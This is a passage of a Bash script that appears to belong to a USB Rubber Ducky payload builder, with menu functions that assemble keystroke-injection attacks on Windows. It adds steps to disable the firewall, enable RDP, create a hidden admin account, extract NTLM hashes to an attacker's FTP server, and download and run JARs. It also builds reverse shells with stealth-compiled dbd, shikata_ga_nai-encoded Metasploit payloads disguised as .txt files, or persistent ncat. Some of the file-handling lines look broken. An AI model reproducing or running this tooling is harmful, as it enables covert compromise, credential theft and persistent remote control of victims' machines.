| ############ Pre Attack Option Add ########################### | |
| ####### Minimize Command Prompt ########### | |
| f_minimizecmd(){ | |
| clear | |
| echo -e "\e[1;34mAdding the hide command prompt option to your payload...\e[0m" | |
| echo "" | |
| sleep 3 | |
| cat /usr/share/simple-ducky/payloads/builder/pre-attack/hidecmd.conf >> /usr/share/simple-ducky/payload.txt | |
| echo >> /usr/share/simple-ducky/payload.txt | |
| echo "" | |
| echo -e "\e[1;32mDone! Returning to the Pre-Attack menu...\e[0m" | |
| echo "" | |
| sleep 3 | |
| f_preattackadd | |
| } | |
| ####### Disable Firewall Option ########### | |
| f_disablefirewall(){ | |
| clear | |
| echo -e "\e[1;34mAdding the disable firewall option to your payload...\e[0m" | |
| echo "" | |
| sleep 3 | |
| cat /usr/share/simple-ducky/payloads/builder/pre-attack/firewall.conf >> /usr/share/simple-ducky/payload.txt | |
| echo >> /usr/share/simple-ducky/payload.txt | |
| echo "" | |
| echo -e "\e[1;32mDone! Returning to the Pre-Attack menu...\e[0m" | |
| echo "" | |
| sleep 3 | |
| f_preattackadd | |
| } | |
| ####### Enable Remote Desktop ########### | |
| f_enablerdp(){ | |
| clear | |
| echo -e "\e[1;34mAdding the enable remote desktop and remote assistant option to your payload...\e[0m" | |
| echo "" | |
| sleep 3 | |
| cat /usr/share/simple-ducky/payloads/builder/pre-attack/rdpenable.conf >> /usr/share/simple-ducky/payload.txt | |
| echo >> /usr/share/simple-ducky/payload.txt | |
| echo "" | |
| echo -e "\e[1;32mDone! Returning to the Pre-Attack menu...\e[0m" | |
| echo "" | |
| sleep 3 | |
| f_preattackadd | |
| } | |
| ####### Admin Account Add Option ########### | |
| f_createusr(){ | |
| clear | |
| echo -e "\e[1;34mLet's configure the admin account. Note, the account will be hiden from the windows login screen...\e[0m" | |
| echo "" | |
| echo "" | |
| read -p "What would you like the username to be for your admin account? " attackeruser | |
| echo "" | |
| read -p "What would you like the password to be for your admin account? " attackerpass | |
| echo "" | |
| clear | |
| echo -e "\e[1;34mAdding the admin account to your payload...\e[0m" | |
| echo "" | |
| sed "/STRING/s/attackeruser/$attackeruser/g" /usr/share/simple-ducky/payloads/builder/pre-attack/admusradd.conf > /usr/share/simple-ducky/payloads/builder/pre-attack/admusradd_del1.conf | |
| sed "/STRING/s/attackerpass/$attackerpass/g" /usr/share/simple-ducky/payloads/builder/pre-attack/admusradd_del1.conf > /usr/share/simple-ducky/payloads/builder/pre-attack/admusradd_del2.conf | |
| sed "/STRING/s/attackerpass/$attackerpass/g" /usr/share/simple-ducky/payloads/builder/pre-attack/admusradd_del2.conf > /usr/share/simple-ducky/payloads/builder/pre-attack/admusradd_del3.conf | |
| cat /usr/share/simple-ducky/payloads/builder/pre-attack/admusradd_del3.conf >> /usr/share/simple-ducky/payload.txt | |
| echo >> /usr/share/simple-ducky/payload.txt | |
| rm /usr/share/simple-ducky/payloads/builder/pre-attack/admusradd_del1.conf | |
| rm /usr/share/simple-ducky/payloads/builder/pre-attack/admusradd_del2.conf | |
| rm /usr/share/simple-ducky/payloads/builder/pre-attack/admusradd_del3.conf | |
| echo "" | |
| echo -e "\e[1;32mDone! Returning to the Pre-Attack menu...\e[0m" | |
| echo "" | |
| sleep 3 | |
| f_preattackadd | |
| } | |
| ############ Main Attack Option Add ########################### | |
| ####### Extract Live Hash Option ########### | |
| f_extracthash(){ | |
| clear | |
| echo -e "\e[1;34mLet's configure some settings for the LM/NTLM extraction...\e[0m" | |
| echo "" | |
| echo "" | |
| read -p "What is the IP/Domain of your ftp server? " attackerftp | |
| echo "" | |
| read -p "What is the username for your ftp server? " attackerusername | |
| echo "" | |
| read -p "What is the password for your ftp server? " attackerpassword | |
| echo "" | |
| echo -e "What is the IP/Domain address for your webserver? " | |
| read -p "[Example: www.example.com | www.example.com:port | $attackerftp]: " webserverip | |
| echo "" | |
| read -p "Please set a password to be for your encrypted zip files: " zippassword | |
| echo "" | |
| clear | |
| echo -e "\e[1;34mAdding the live hash extractor to your payload...\e[0m" | |
| echo "" | |
| sed "/STRING/s/attackerftp/$attackerftp/g" /usr/share/simple-ducky/payloads/builder/main-attack/livehash.conf > /usr/share/simple-ducky/payloads/builder/main-attack/livehash_del1.conf | |
| sed "/STRING/s/attackerusername/$attackerusername/g" /usr/share/simple-ducky/payloads/builder/main-attack/livehash_del1.conf > /usr/share/simple-ducky/payloads/builder/main-attack/livehash_del2.conf | |
| sed "/STRING/s/attackerpassword/$attackerpassword/g" /usr/share/simple-ducky/payloads/builder/main-attack/livehash_del2.conf > /usr/share/simple-ducky/payloads/builder/main-attack/livehash_del3.conf | |
| sed "/STRING/s/webserverip/$webserverip/g" /usr/share/simple-ducky/payloads/builder/main-attack/livehash_del3.conf > /usr/share/simple-ducky/payloads/builder/main-attack/livehash_del4.conf | |
| sed "/STRING/s/zippassword/$zippassword/g" /usr/share/simple-ducky/payloads/builder/main-attack/livehash_del4.conf > /usr/share/simple-ducky/payloads/builder/main-attack/livehash_del5.conf | |
| sed "/STRING/s/zippassword/$zippassword/g" /usr/share/simple-ducky/payloads/builder/main-attack/livehash_del5.conf > /usr/share/simple-ducky/payloads/builder/main-attack/livehash_del6.conf | |
| sed "/STRING/s/zippassword/$zippassword/g" /usr/share/simple-ducky/payloads/builder/main-attack/livehash_del6.conf > /usr/share/simple-ducky/payloads/builder/main-attack/livehash_del7.conf | |
| cat /usr/share/simple-ducky/payloads/builder/main-attack/livehash_del7.conf >> /usr/share/simple-ducky/payload.txt | |
| echo >> /usr/share/simple-ducky/payload.txt | |
| rm /usr/share/simple-ducky/payloads/builder/main-attack/livehash_del1.conf | |
| rm /usr/share/simple-ducky/payloads/builder/main-attack/livehash_del2.conf | |
| rm /usr/share/simple-ducky/payloads/builder/main-attack/livehash_del3.conf | |
| rm /usr/share/simple-ducky/payloads/builder/main-attack/livehash_del4.conf | |
| rm /usr/share/simple-ducky/payloads/builder/main-attack/livehash_del5.conf | |
| rm /usr/share/simple-ducky/payloads/builder/main-attack/livehash_del6.conf | |
| rm /usr/share/simple-ducky/payloads/builder/main-attack/livehash_del7.conf | |
| cp /usr/share/simple-ducky/misc/7za.exe /var/www/7za.exe | |
| echo "" | |
| echo -e "\e[1;32mDone! Returning to the Main-Attack menu...\e[0m" | |
| echo "" | |
| sleep 3 | |
| f_attackadd | |
| } | |
| ####### Down & Execute JAR ########### | |
| f_jarexecute(){ | |
| clear | |
| echo -e "\e[1;34mDownload and Execute JAR\e[0m" | |
| echo "" | |
| read -p "Where is your JAR located? " jarpath | |
| echo "" | |
| #Check if file exists | |
| if [ -e $jarpath ] | |
| then | |
| echo "File is valid, copying to web server..." | |
| cp $jarpath /var/www/7za.txt | |
| clear | |
| echo -e "\e[1;34mNow let's build your inject.bin\e[0m" | |
| echo "" | |
| echo -e "\e[1;34mWhat is the IP/Domain address for your webserver?\e[0m" | |
| read -p "[Example: www.example.com | www.example.com:port | $attackerip] " webserverip | |
| echo "" | |
| clear | |
| echo -e "\e[1;34mAdding the JAR to your payload...\e[0m" | |
| echo "" | |
| sed "/http/s/domain/$webserverip/g" /usr/share/simple-ducky/payloads/builder/main-attack/jarexecute.conf > /usr/share/simple-ducky/payloads/builder/main-attack/jarexecute_del1.conf | |
| cat /usr/share/simple-ducky/payloads/builder/main-attack/jarexecute_del1.conf >> /usr/share/simple-ducky/payload.txt | |
| echo >> /usr/share/simple-ducky/payload.txt | |
| rm /usr/share/simple-ducky/payloads/builder/main-attack/jarexecute_del1.conf | |
| echo "" | |
| read -p "Press Enter to continue..." contuinue | |
| f_attackadd | |
| else | |
| echo "File does not exist, please try again! (3 seconds)" | |
| sleep 3 | |
| f_jarexecute | |
| fi | |
| } | |
| ####### Reverse Shell Options ########### | |
| f_revshells(){ | |
| clear | |
| if [[ $osselect = 3 || $osselect = 5 ]]; then | |
| clear | |
| echo -e "\e[1;34mShell Options. Note: Only use one...\e[0m" | |
| echo "" | |
| echo "1. DBD Reverse Shell (Best | Provides an encrypted persistant shell every 90 minutes)" | |
| echo "2. Ncat Persistant Reverse Shell (Great | Provides a new shell everytime a user logs in)" | |
| echo "3. Metasploit Executable (Good | Gets dinged by most AV | Meterpreter or Standard Shell)" | |
| echo "4. No Download Reverse Shell (Great | Long build time)" | |
| echo "" | |
| read -p "Option: " shelltype | |
| if [ "$shelltype" == "1" ]; then | |
| clear | |
| echo -e "\e[1;34mLet's configure some settings for the DBD reverse shell...\e[0m" | |
| echo "" | |
| echo "" | |
| read -p "Where shall I send your persistent shell? " attackerip | |
| echo "" | |
| read -p "What port will you be listening on? " attackerport | |
| echo "" | |
| read -p "What would you like the shared secret to be on your secure connection? " attackersecret | |
| echo "" | |
| clear | |
| echo -e "\e[1;34mBuilding your custom dbd payload, this will take a moment...\e[0m" | |
| sleep 3 | |
| sed "/HOST/s/attackerip/$attackerip/g" /usr/share/simple-ducky/misc/dbd/conf/dbd_win_reverse.conf > /usr/share/simple-ducky/misc/dbd/dbd_win_reverse1.conf | |
| sed "/PORT/s/attackerport/$attackerport/g" /usr/share/simple-ducky/misc/dbd/dbd_win_reverse1.conf > /usr/share/simple-ducky/misc/dbd/dbd_win_reverse2.conf | |
| sed "/SHARED_SECRET/s/attackersecret/$attackersecret/g" /usr/share/simple-ducky/misc/dbd/dbd_win_reverse2.conf > /usr/share/simple-ducky/misc/dbd/dbd.h | |
| rm /usr/share/simple-ducky/misc/dbd/dbd_win_reverse1.conf | |
| rm /usr/share/simple-ducky/misc/dbd/dbd_win_reverse2.conf | |
| cd /usr/share/simple-ducky/misc/dbd/ | |
| make mingw-cross CFLAGS=-DSTEALTH | |
| cp /usr/share/simple-ducky/misc/dbd/dbd.exe /var/www/winmgnt.txt | |
| cp /usr/share/simple-ducky/misc/psexec.exe /var/www/taskmgnt.txt | |
| rm dbd.exe | |
| cd /usr/share/simple-ducky | |
| echo -e "" | |
| echo -e "\e[1;34mDone!\e[0m" | |
| sleep 3 | |
| clear | |
| echo -e "\e[1;34mNow let's configure the setting to add to your inject.bin\e[0m" | |
| echo "" | |
| echo -e "\e[1;34mWhat is the IP/Domain address for your webserver?\e[0m" | |
| read -p "[Example: www.example.com | www.example.com:port | 192.168.1.100 ] " webserverip | |
| echo "" | |
| clear | |
| echo -e "\e[1;34mAdding the DBD Revervse Shell to your payload...\e[0m" | |
| echo "" | |
| sed "/http/s/domain/$webserverip/g" /usr/share/simple-ducky/payloads/builder/main-attack/powershellsys.conf > /usr/share/simple-ducky/payloads/builder/main-attack/powershellsys_del1.conf | |
| cat /usr/share/simple-ducky/payloads/builder/main-attack/powershellsys_del1.conf >> /usr/share/simple-ducky/payload.txt | |
| echo >> /usr/share/simple-ducky/payload.txt | |
| rm /usr/share/simple-ducky/payloads/builder/main-attack/powershellsys_del1.conf | |
| echo "" | |
| echo -e "\e[1;32mDone! When you are ready to receive your shell use this command...\e[0m" | |
| echo "dbd -lvp $attackerport -k $attackersecret" | |
| echo "" | |
| read -p "Press Enter to continue..." contuinue | |
| f_attackadd | |
| elif [ "$shelltype" == "2" ]; then | |
| clear | |
| echo -e "\e[1;34mLet's configure some settings for Ncat persistant reverse shell...\e[0m" | |
| echo "" | |
| echo "" | |
| read -p "What would you like the username to be for your admin account? " attackeruser | |
| echo "" | |
| read -p "What would you like the password to be for your admin account? " attackerpass | |
| echo "" | |
| read -p "Where shall I send your persistent shell? " attackerip | |
| echo "" | |
| read -p "What port will you be listening on? " attackerport | |
| echo "" | |
| echo -e "What is the IP/Domain address for your webserver? " | |
| read -p "[Example: www.example.com | www.example.com:port | $attackerip] " webserverip | |
| echo "" | |
| clear | |
| echo -e "\e[1;34mAdding a persistant revervse shell to your payload...\e[0m" | |
| echo "" | |
| sed "/STRING/s/attackeruser/$attackeruser/g" /usr/share/simple-ducky/payloads/builder/main-attack/ncshell.conf > /usr/share/simple-ducky/payloads/builder/main-attack/ncshell_del1.conf | |
| sed "/STRING/s/attackerpass/$attackerpass/g" /usr/share/simple-ducky/payloads/builder/main-attack/ncshell_del1.conf > /usr/share/simple-ducky/payloads/builder/main-attack/ncshell_del2.conf | |
| sed "/STRING/s/attackeruser/$attackeruser/g" /usr/share/simple-ducky/payloads/builder/main-attack/ncshell_del2.conf > /usr/share/simple-ducky/payloads/builder/main-attack/ncshell_del3.conf | |
| sed "/STRING/s/attackerip-attackerport/$attackerip $attackerport/g" /usr/share/simple-ducky/payloads/builder/main-attack/ncshell_del3.conf > /usr/share/simple-ducky/payloads/builder/main-attack/ncshell_del4.conf | |
| sed "/STRING/s/webserverip/$webserverip/g" /usr/share/simple-ducky/payloads/builder/main-attack/ncshell_del4.conf > /usr/share/simple-ducky/payloads/builder/main-attack/ncshell_del4.conf | |
| cat /usr/share/simple-ducky/payloads/builder/main-attack/ncshell_del3.conf >> /usr/share/simple-ducky/payload.txt | |
| echo >> /usr/share/simple-ducky/payload.txt | |
| rm /usr/share/simple-ducky/payloads/builder/main-attack/ncshell_del1.conf | |
| rm /usr/share/simple-ducky/payloads/builder/main-attack/ncshell_del2.conf | |
| rm /usr/share/simple-ducky/payloads/builder/main-attack/ncshell_del3.conf | |
| rm /usr/share/simple-ducky/payloads/builder/main-attack/ncshell_del4.conf | |
| rm /usr/share/simple-ducky/payloads/builder/main-attack/ncshell_del5.conf | |
| cp /usr/share/simple-ducky/misc/ncat.exe /var/www/ | |
| echo "" | |
| echo -e "\e[1;32mDone! When you are ready to receive your shell use this command...\e[0m" | |
| echo "ncat -lvp $attackerport" | |
| echo "" | |
| read -p "Press Enter to continue..." contuinue | |
| f_attackadd | |
| elif [ "$shelltype" == "3" ]; then | |
| clear | |
| echo -e "\e[1;34mLets start by building your evil executable\e[0m" | |
| echo "" | |
| echo "" | |
| read -p "Where shall I send your shell? " attackerip | |
| echo "" | |
| read -p "What port will you be listening on? " attackerport | |
| echo -e "" | |
| read -p "Would you like a meterpreter or standard shell[ met | std ]? " payloadtype | |
| clear | |
| echo -e "\e[1;34mMetasploit is generating your payload, this will take a moment...\e[0m" | |
| if [ "$payloadtype" == "met" ]; then | |
| msfpayload windows/meterpreter/reverse_tcp LHOST=$attackerip LPORT=$attackerport R | msfencode -e x86/shikata_ga_nai -c 5 -t exe -o /var/www/winmgmt.txt | |
| else | |
| msfpayload windows/shell_reverse_tcp LHOST=$attackerip LPORT=$attackerport R | msfencode -e x86/shikata_ga_nai -c 5 -t exe -o /var/www/winmgmt.txt | |
| fi | |
| echo -e "" | |
| echo -e "\e[1;34mDone!\e[0m" | |
| sleep 3 | |
| clear | |
| echo -e "\e[1;34mNow let's build your inject.bin\e[0m" | |
| echo "" | |
| echo -e "\e[1;34mWhat is the IP/Domain address for your webserver?\e[0m" | |
| read -p "[Example: www.example.com | www.example.com:port | $attackerip] " webserverip | |
| echo "" | |
| clear | |
| echo -e "\e[1;34mAdding a Metasploit shell to your payload...\e[0m" | |
| echo "" | |
| sed "/http/s/domain/$webserverip/g" /usr/share/simple-ducky/payloads/builder/main-attack/powershellexec.conf > /usr/share/simple-ducky/payloads/builder/main-attack/powershellexec_del1.conf | |
| cat /usr/share/simple-ducky/payloads/builder/main-attack/powershellexec_del1.conf >> /usr/share/simple-ducky/payload.txt | |
| echo >> /usr/share/simple-ducky/payload.txt | |
| rm /usr/share/simple-ducky/payloads/builder/main-attack/powershellexec_del1.conf | |
| echo "" | |
| echo -e "\e[1;32mDone! When you are ready to receive your shell use this command...\e[0m" | |
| if [ "$payloadtype" == "met" ]; then | |
| echo "msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/reverse_tcp LHOST=$attackerip LPORT=$attackerport E" | |
| else | |
| echo " ncat -lvp $attackerport" | |
| fi | |
| echo "" | |
| read -p "Press Enter to continue..." contuinue | |
| f_attackadd | |
| elif [ "$shelltype" == "4" ]; then | |
| clear | |
| echo -e "\e[1;34mLet's configure some settings for the no download reverse shell.\e[0m" | |
| echo "" | |
| echo "" | |
| read -p "Where shall I send your shell? " attackerip | |
| echo "" | |
| read -p "What port will you be listening on? " attackerport | |
| echo "" | |
| clear | |
| echo -e "\e[1;34mAdding adding the no download shell to your payload...\e[0m" | |
| echo "" | |
| sed "/STRING/s/attackerip/$attackerip/g" /usr/share/simple-ducky/payloads/builder/main-attack/nodownloadshell.conf > /usr/share/simple-ducky/payloads/builder/main-attack/nodownloadshell_del1.conf | |
| sed "/STRING/s/attackerport/$attackerport/g" /usr/share/simple-ducky/payloads/builder/main-attack/nodownloadshell_del1.conf > /usr/share/simple-ducky/payloads/builder/main-attack/nodownloadshell_del2.conf | |
| cat /usr/share/simple-ducky/payloads/builder/main-attack/nodownloadshell_del2.conf >> /usr/share/simple-ducky/payload.txt | |
| echo >> /usr/share/simple-ducky/payload.txt | |
| rm /usr/share/simple-ducky/payloads/builder/main-attack/nodownloadshell_del1.conf | |
| rm /usr/share/simple-ducky/payloads/builder/main-attack/nodownloadshell_del2.conf | |
| echo "" | |
| echo -e "\e[1;32mDone! When you are ready to receive your shell use this command...\e[0m" | |
| echo "ncat -lvp $attackerport" | |
| echo "" | |
| read -p "Press Enter to continue..." contuinue | |
| f_attackadd | |
| fi | |
| elif [ "$osselect" == "1" ]; then | |
| clear | |
| echo -e "\e[1;34mLet's configure some settings for the no download reverse shell.\e[0m" | |
| echo "" | |
| echo "" | |
| read -p "Where shall I send your shell? " attackerip | |
| echo "" | |
| read -p "What port will you be listening on? " attackerport | |
| echo "" | |
| clear | |
| echo -e "\e[1;34mAdding adding the no download shell to your payload...\e[0m" | |
| echo "" | |
| sed "/STRING/s/attackerip/$attackerip/g" /usr/share/simple-ducky/payloads/builder/main-attack/nodownloadshell.conf > /usr/share/simple-ducky/payloads/builder/main-attack/nodownloadshell_del1.conf | |
| sed "/STRING/s/attackerport/$attackerport/g" /usr/share/simple-ducky/payloads/builder/main-attack/nodownloadshell_del1.conf > /usr/share/simple-ducky/payloads/builder/main-attack/nodownloadshell_del2.conf | |
| cat /usr/share/simple-ducky/payloads/builder/main-attack/nodownloadshell_del2.conf >> /usr/share/simple-ducky/payload.txt | |
| echo >> /usr/share/simple-ducky/payload.txt | |
| rm /usr/share/simple-ducky/payloads/builder/main-attack/nodownloadshell_del1.conf | |
| rm /usr/share/simple-ducky/payloads/builder/main-attack/nodownloadshell_del2.conf | |
| echo "" | |
| echo -e "\e[1;32mDone! When you are ready to receive your shell use this command...\e[0m" | |
| echo "ncat -lvp $attackerport" | |
| echo "" | |
| read -p "Press Enter to continue..." contuinue | |
| f_attackadd | |
| elif [[ $osselect == 2 || $osselect = 4 ]]; then | |
| clear | |
| echo -e "\e[1;34mShell Options. Note: Only use one...\e[0m" | |
| echo "" | |
| echo "1. DBD Reverse Shell (Best | Provides an encrypted persistant shell every 90 minutes)" | |
| echo "2. Metasploit Executable (Good | Gets dinged by most AV | Meterpreter or Standard Shell)" | |
| echo "3. No Download Reverse Shell (Great | Long build time)" | |
| echo "" | |
| read -p "Option: " shelltype | |
| if [ "$shelltype" == "1" ]; then | |
| clear | |
| echo -e "\e[1;34mLet's configure some settings for the DBD reverse shell...\e[0m" | |
| echo "" | |
| echo "" | |
| read -p "Where shall I send your persistent shell? " attackerip | |
| echo "" | |
| read -p "What port will you be listening on? " attackerport | |
| echo "" | |
| read -p "What would you like the shared secret to be on your secure connection? " attackersecret | |
| echo "" | |
| clear | |
| echo -e "\e[1;34mBuilding your custom dbd payload, this will take a moment...\e[0m" | |
| sleep 3 | |
| sed "/HOST/s/attackerip/$attackerip/g" /usr/share/simple-ducky/misc/dbd/conf/dbd_win_reverse.conf > /usr/share/simple-ducky/misc/dbd/dbd_win_reverse1.conf | |
| sed "/PORT/s/attackerport/$attackerport/g" /usr/share/simple-ducky/misc/dbd/dbd_win_reverse1.conf > /usr/share/simple-ducky/misc/dbd/dbd_win_reverse2.conf | |
| sed "/SHARED_SECRET/s/attackersecret/$attackersecret/g" /usr/share/simple-ducky/misc/dbd/dbd_win_reverse2.conf > /usr/share/simple-ducky/misc/dbd/dbd.h | |
| rm /usr/share/simple-ducky/misc/dbd/dbd_win_reverse1.conf | |
| rm /usr/share/simple-ducky/misc/dbd/dbd_win_reverse2.conf | |
| cd /usr/share/simple-ducky/misc/dbd/ | |
| make mingw-cross CFLAGS=-DSTEALTH | |
| cp /usr/share/simple-ducky/misc/dbd/dbd.exe /var/www/winmgnt.txt | |
| cp /usr/share/simple-ducky/misc/psexec.exe /var/www/taskmgnt.txt | |
| rm dbd.exe | |
| cd /usr/share/simple-ducky | |
| echo -e "" | |
| echo -e "\e[1;34mDone!\e[0m" | |
| sleep 3 | |
| clear | |
| echo -e "\e[1;34mNow let's configure the setting to add to your inject.bin\e[0m" | |
| echo "" | |
| echo -e "\e[1;34mWhat is the IP/Domain address for your webserver?\e[0m" | |
| read -p "[Example: www.example.com | www.example.com:port | 192.168.1.100 ] " webserverip | |
| echo "" | |
| clear | |
| echo -e "\e[1;34mAdding the DBD Revervse Shell to your payload...\e[0m" | |
| echo "" | |
| sed "/http/s/domain/$webserverip/g" /usr/share/simple-ducky/payloads/builder/main-attack/powershellexec.conf > /usr/share/simple-ducky/payloads/builder/main-attack/powershellexec_del1.conf | |
| cat /usr/share/simple-ducky/payloads/builder/main-attack/powershellexec_del1.conf >> /usr/share/simple-ducky/payload.txt | |
| echo >> /usr/share/simple-ducky/payload.txt | |
| rm /usr/share/simple-ducky/payloads/builder/main-attack/powershellexec_del1.conf | |
| echo "" | |
| echo -e "\e[1;32mDone! When you are ready to receive your shell use this command...\e[0m" | |
| echo "dbd -lvp $attackerport -k $attackersecret" | |
| echo "" | |
| read -p "Press Enter to continue..." contuinue | |
| f_attackadd | |
| elif [ "$shelltype" == "2" ]; then | |
| clear | |
| echo -e "\e[1;34mLet's configure some settings for Ncat persistant reverse shell...\e[0m" | |
| echo "" | |
| echo "" | |
| read -p "What would you like the username to be for your admin account? " attackeruser | |
| echo "" | |
| read -p "What would you like the password to be for your admin account? " attackerpass | |
| echo "" | |
| read -p "Where shall I send your persistent shell? " attackerip | |
| echo "" | |
| read -p "What port will you be listening on? " attackerport | |
| echo "" | |
| echo -e "What is the IP/Domain address for your webserver? " | |
| read -p "[Example: www.example.com | www.example.com:port | $attackerip] " webserverip | |
| echo "" | |
| clear | |
| echo -e "\e[1;34mAdding a persistant revervse shell to your payload...\e[0m" | |
| echo "" | |
| sed "/STRING/s/attackeruser/$attackeruser/g" /usr/share/simple-ducky/payloads/builder/main-attack/ncshell.conf > /usr/share/simple-ducky/payloads/builder/main-attack/ncshell_del1.conf | |
| sed "/STRING/s/attackerpass/$attackerpass/g" /usr/share/simple-ducky/payloads/builder/main-attack/ncshell_del1.conf > /usr/share/simple-ducky/payloads/builder/main-attack/ncshell_del2.conf | |
| sed "/STRING/s/attackeruser/$attackeruser/g" /usr/share/simple-ducky/payloads/builder/main-attack/ncshell_del2.conf > /usr/share/simple-ducky/payloads/builder/main-attack/ncshell_del3.conf | |
| sed "/STRING/s/attackerip-attackerport/$attackerip $attackerport/g" /usr/share/simple-ducky/payloads/builder/main-attack/ncshell_del3.conf > /usr/share/simple-ducky/payloads/builder/main-attack/ncshell_del4.conf | |
| sed "/STRING/s/webserverip/$webserverip/g" /usr/share/simple-ducky/payloads/builder/main-attack/ncshell_del4.conf > /usr/share/simple-ducky/payloads/builder/main-attack/ncshell_del4.conf | |
| cat /usr/share/simple-ducky/payloads/builder/main-attack/ncshell_del3.conf >> /usr/share/simple-ducky/payload.txt | |
| echo >> /usr/share/simple-ducky/payload.txt | |
| rm /usr/share/simple-ducky/payloads/builder/main-attack/ncshell_del1.conf | |
| rm /usr/share/simple-ducky/payloads/builder/main-attack/ncshell_del2.conf | |
| rm /usr/share/simple-ducky/payloads/builder/main-attack/ncshell_del3.conf | |
| rm /usr/share/simple-ducky/payloads/builder/main-attack/ncshell_del4.conf | |
| rm /usr/share/simple-ducky/payloads/builder/main-attack/ncshell_del5.conf | |
| cp /usr/share/simple-ducky/misc/ncat.exe /var/www/ | |
| echo "" | |
| echo -e "\e[1;32mDone! When you are ready to receive your shell use this command...\e[0m" | |
| echo "ncat -lvp $attackerport" | |
| echo "" | |
| read -p "Press Enter to continue..." contuinue | |
| f_attackadd | |
| elif [ "$shelltype" == "3" ]; then | |
| clear | |
| echo -e "\e[1;34mLet's configure some settings for the no download reverse shell.\e[0m" | |
| echo "" | |
| echo "" | |
| read -p "Where shall I send your shell? " attackerip | |
| echo "" | |
| read -p "What port will you be listening on? " attackerport | |
| echo "" | |
| clear | |
| echo -e "\e[1;34mAdding adding the no download shell to your payload...\e[0m" | |
| echo "" | |
| sed "/STRING/s/attackerip/$attackerip/g" /usr/share/simple-ducky/payloads/builder/main-attack/nodownloadshell.conf > /usr/share/simple-ducky/payloads/builder/main-attack/nodownloadshell_del1.conf | |
| sed "/STRING/s/attackerport/$attackerport/g" /usr/share/simple-ducky/payloads/builder/main-attack/nodownloadshell_del1.conf > /usr/share/simple-ducky/payloads/builder/main-attack/nodownloadshell_del2.conf | |
| cat /usr/share/simple-ducky/payloads/builder/main-attack/nodownloadshell_del2.conf >> /usr/share/simple-ducky/payload.txt | |
| echo >> /usr/share/simple-ducky/payload.txt | |
| rm /usr/share/simple-ducky/payloads/builder/main-attack/nodownloadshell_del1.conf | |
| rm /usr/share/simple-ducky/payloads/builder/main-attack/nodownloadshell_del2.conf | |
| echo "" | |
| echo -e "\e[1;32mDone! When you are ready to receive your shell use this command...\e[0m" | |
| echo "ncat -lvp $attackerport" | |
| echo "" | |
| read -p "Press Enter to continue..." contuinue | |
| f_attackadd | |
| fi | |
| fi | |
| } | |
| ####### Proxy in the Middle Option ########### | |
| f_pitmattack(){ | |
| if [[ $osselect == 1 || $osselect = 2 || $osselect = 3 ]]; then | |
| clear | |
| echo -e "\e[1;34mLet's configure some settings for the Proxy in the Middle attack. Note, this will be the first option to run...\e[0m" | |
| echo "" | |
| echo "" | |
| read -p "What IP/domain would you like to use for your proxy server? " attackerip | |
| echo "" | |
| read -p "What port will you be using for your proxy server (example: 8081)? " attackerport | |
| echo "" | |
| clear | |
| echo -e "\e[1;34mAdding the Proxy in the Middle attack to your payload...\e[0m" | |
| echo "" | |
| sed "/STRING/s/attackerip/$attackerip/g" /usr/share/simple-ducky/payloads/builder/main-attack/pitmvis7.conf > /usr/share/simple-ducky/payloads/builder/main-attack/pitmvis7_del1.conf | |
| sed "/STRING/s/attackerport/$attackerport/g" /usr/share/simple-ducky/payloads/builder/main-attack/pitmvis7_del1.conf > /usr/share/simple-ducky/payloads/builder/main-attack/pitmvis7_del2.conf | |
| #echo >> /usr/share/simple-ducky/payloads/builder/main-attack/pitmvis7_del2.conf | |
| cat /usr/share/simple-ducky/payload.txt >> /usr/share/simple-ducky/payloads/builder/main-attack/pitmvis7_del2.conf | |
| cp /usr/share/simple-ducky/payloads/builder/main-attack/pitmvis7_del2.conf /usr/share/simple-ducky/payload.txt | |
| rm /usr/share/simple-ducky/payloads/builder/main-attack/pitmvis7_del1.conf | |
| rm /usr/share/simple-ducky/payloads/builder/main-attack/pitmvis7_del2.conf | |
| echo "" | |
| echo -e "\e[1;34mSet the following options in Burp Suite...\e[0m" | |
| echo "" | |
| sleep 2 | |
| echo "" | |
| echo '1) Select the "Proxy" tab' | |
| echo "" | |
| echo '2) Under "Intercept" ensure that "Intercept is off"' | |
| echo "" | |
| echo '3) Select the "Options" tab under "Proxy"' | |
| echo "" | |
| echo '4) Under "Proxy Listeners" select "Add" to add a new listener' | |
| echo "" | |
| echo "5) In the "Bind to port:" radio box put $attackerport" | |
| echo "" | |
| echo "6) Click the "Specific address:" radio button and select $attackerip / the attacking machines IP address" | |
| echo "" | |
| echo '7) Select the "History" tab to view the traffic from the victims machine' | |
| echo "" | |
| read -p "Press any key to contiue" enter | |
| echo "" | |
| echo -e "\e[1;32mDone! Returning to the Pre-Attack menu...\e[0m" | |
| echo "" | |
| sleep 3 | |
| elif [[ $osselect == 4 || $osselect = 5 ]]; then | |
| clear | |
| echo -e "\e[1;34mLet's configure some settings for the Proxy in the Middle attack. Note, this will be the first option to run...\e[0m" | |
| echo "" | |
| echo "" | |
| read -p "What IP/domain would you like to use for your proxy server? " attackerip | |
| echo "" | |
| read -p "What port will you be using for your proxy server (example: 8081)? " attackerport | |
| echo "" | |
| clear | |
| echo -e "\e[1;34mAdding the Proxy in the Middle attack to your payload...\e[0m" | |
| echo "" | |
| sed "/STRING/s/attackerip/$attackerip/g" /usr/share/simple-ducky/payloads/builder/main-attack/pitmwin8.conf > /usr/share/simple-ducky/payloads/builder/main-attack/pitmwin8_del1.conf | |
| sed "/STRING/s/attackerport/$attackerport/g" /usr/share/simple-ducky/payloads/builder/main-attack/pitmwin8_del1.conf > /usr/share/simple-ducky/payloads/builder/main-attack/pitmwin8_del2.conf | |
| #echo >> /usr/share/simple-ducky/payloads/builder/main-attack/pitmvis7_del2.conf | |
| cat /usr/share/simple-ducky/payload.txt >> /usr/share/simple-ducky/payloads/builder/main-attack/pitmvis8_del2.conf | |
| cp /usr/share/simple-ducky/payloads/builder/main-attack/pitmvis8_del2.conf /usr/share/simple-ducky/payload.txt | |
| rm /usr/share/simple-ducky/payloads/builder/main-attack/pitmwin8_del1.conf | |
| rm /usr/share/simple-ducky/payloads/builder/main-attack/pitmwin8_del2.conf | |
| echo "" | |
| echo -e "\e[1;34mSet the following options in Burp Suite...\e[0m" | |
| echo "" | |
| sleep 2 | |
| echo "" | |
| echo '1) Select the "Proxy" tab' | |
| echo "" | |
| echo '2) Under "Intercept" ensure that "Intercept is off"' | |
| echo "" | |
| echo '3) Select the "Options" tab under "Proxy"' | |
| echo "" | |
| echo '4) Under "Proxy Listeners" select "Add" to add a new listener' | |
| echo "" | |
| echo "5) In the "Bind to port:" radio box put $attackerport" | |
| echo "" | |
